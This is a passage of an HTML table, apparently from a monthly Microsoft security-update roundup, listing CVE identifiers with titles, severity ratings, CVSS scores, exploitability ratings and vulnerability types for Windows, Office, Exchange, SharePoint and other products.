  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45641"><span>CVE-2026-45641</span></a></td>
  <td width="256" class="xl68">Windows Hyper-V Remote
  Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47652"><span>CVE-2026-47652</span></a></td>
  <td width="256" class="xl68">Windows Hyper-V Remote
  Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">8.2</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47288"><span>CVE-2026-47288</span></a></td>
  <td width="256" class="xl68">Windows Kerberos Key
  Distribution Center (KDC) Remote Code Execution</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45657"><span>CVE-2026-45657</span></a></td>
  <td width="256" class="xl68">Windows Kernel Remote
  Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">9.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48574"><span>CVE-2026-48574</span></a></td>
  <td width="256" class="xl68">Windows Media Remote
  Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45490"><span>CVE-2026-45490</span></a></td>
  <td width="256" class="xl68">.NET SDK Elevation of
  Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45491"><span>CVE-2026-45491</span></a></td>
  <td width="256" class="xl68">.NET Tampering
  Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.2</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Tampering</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45591"><span>CVE-2026-45591</span></a></td>
  <td width="256" class="xl68">ASP.NET Core Denial of
  Service Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47643"><span>CVE-2026-47643</span></a></td>
  <td width="256" class="xl68">Azure Stack Edge
  Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">9.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41098"><span>CVE-2026-41098</span></a></td>
  <td width="256" class="xl68">Azure Stack Edge
  Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45642"><span>CVE-2026-45642</span></a></td>
  <td width="256" class="xl68">Microsoft Azure
  Attestation service and Device Health Attestation Service Spoofing
  Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">3.9</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45650"><span>CVE-2026-45650</span></a></td>
  <td width="256" class="xl68">Microsoft Bing Search
  Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">4.3</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45637"><span>CVE-2026-45637</span></a></td>
  <td width="256" class="xl68">Microsoft DWM Core
  Library Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45647"><span>CVE-2026-45647</span></a></td>
  <td width="256" class="xl68">Microsoft Defender for
  Endpoint for Mac Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40371"><span>CVE-2026-40371</span></a></td>
  <td width="256" class="xl68">Microsoft Dynamics 365
  (on-premises) Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44822"><span>CVE-2026-44822</span></a></td>
  <td width="256" class="xl68">Microsoft Excel
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.2</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45455"><span>CVE-2026-45455</span></a></td>
  <td width="256" class="xl68">Microsoft Excel
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">3.3</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45469"><span>CVE-2026-45469</span></a></td>
  <td width="256" class="xl68">Microsoft Excel Remote
  Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44817"><span>CVE-2026-44817</span></a></td>
  <td width="256" class="xl68">Microsoft Excel Remote
  Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44818"><span>CVE-2026-44818</span></a></td>
  <td width="256" class="xl68">Microsoft Excel Remote
  Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44820"><span>CVE-2026-44820</span></a></td>
  <td width="256" class="xl68">Microsoft Excel Remote
  Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44823"><span>CVE-2026-44823</span></a></td>
  <td width="256" class="xl68">Microsoft Excel Remote
  Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45459"><span>CVE-2026-45459</span></a></td>
  <td width="256" class="xl68">Microsoft Excel
  Security Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">3.3</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45504"><span>CVE-2026-45504</span></a></td>
  <td width="256" class="xl68">Microsoft Exchange
  Server Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45502"><span>CVE-2026-45502</span></a></td>
  <td width="256" class="xl68">Microsoft Exchange
  Server Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45503"><span>CVE-2026-45503</span></a></td>
  <td width="256" class="xl68">Microsoft Exchange
  Server Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45583"><span>CVE-2026-45583</span></a></td>
  <td width="256" class="xl68">Microsoft Exchange
  Server Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45500"><span>CVE-2026-45500</span></a></td>
  <td width="256" class="xl68">Microsoft Exchange
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45501"><span>CVE-2026-45501</span></a></td>
  <td width="256" class="xl68">Microsoft Exchange
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47631"><span>CVE-2026-47631</span></a></td>
  <td width="256" class="xl68">Microsoft Exchange
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42986"><span>CVE-2026-42986</span></a></td>
  <td width="256" class="xl68">Microsoft Graphics
  Component Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41092"><span>CVE-2026-41092</span></a></td>
  <td width="256" class="xl68">Microsoft Kinect
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45644"><span>CVE-2026-45644</span></a></td>
  <td width="256" class="xl68">Microsoft Live Share
  Canvas SDK Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47293"><span>CVE-2026-47293</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Click-To-Run Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45485"><span>CVE-2026-45485</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">3.3</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44821"><span>CVE-2026-44821</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45483"><span>CVE-2026-45483</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Project Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">4.6</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45475"><span>CVE-2026-45475</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44819"><span>CVE-2026-44819</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44824"><span>CVE-2026-44824</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45645"><span>CVE-2026-45645</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49161"><span>CVE-2026-49161</span></a></td>
  <td width="256" class="xl68">Microsoft PC Manager
  Security Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42902"><span>CVE-2026-42902</span></a></td>
  <td width="256" class="xl68">Microsoft PowerToys
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45484"><span>CVE-2026-45484</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45454"><span>CVE-2026-45454</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47298"><span>CVE-2026-47298</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45467"><span>CVE-2026-45467</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">4.6</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45468"><span>CVE-2026-45468</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">4.6</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45479"><span>CVE-2026-45479</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">4.6</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45453"><span>CVE-2026-45453</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47636"><span>CVE-2026-47636</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47637"><span>CVE-2026-47637</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">4.6</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47638"><span>CVE-2026-47638</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">4.6</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47639"><span>CVE-2026-47639</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47641"><span>CVE-2026-47641</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">4.6</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33113"><span>CVE-2026-33113</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45462"><span>CVE-2026-45462</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">4.6</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45464"><span>CVE-2026-45464</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45465"><span>CVE-2026-45465</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47634"><span>CVE-2026-47634</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.3</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47640"><span>CVE-2026-47640</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">4.6</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45481"><span>CVE-2026-45481</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.3</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48560"><span>CVE-2026-48560</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48562"><span>CVE-2026-48562</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">4.6</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42835"><span>CVE-2026-42835</span></a></td>
  <td width="256" class="xl68">Microsoft Teams for
  Android Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45606"><span>CVE-2026-45606</span></a></td>
  <td width="256" class="xl68">Microsoft UxTheme
  Library (uxtheme.dll) Denial of Service Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">DoS</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45482"><span>CVE-2026-45482</span></a></td>
  <td width="256" class="xl68">Microsoft Visual
  Studio Code CoPilot Chat Extension Security Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45466"><span>CVE-2026-45466</span></a></td>
  <td width="256" class="xl68">Microsoft Word
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">3.3</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
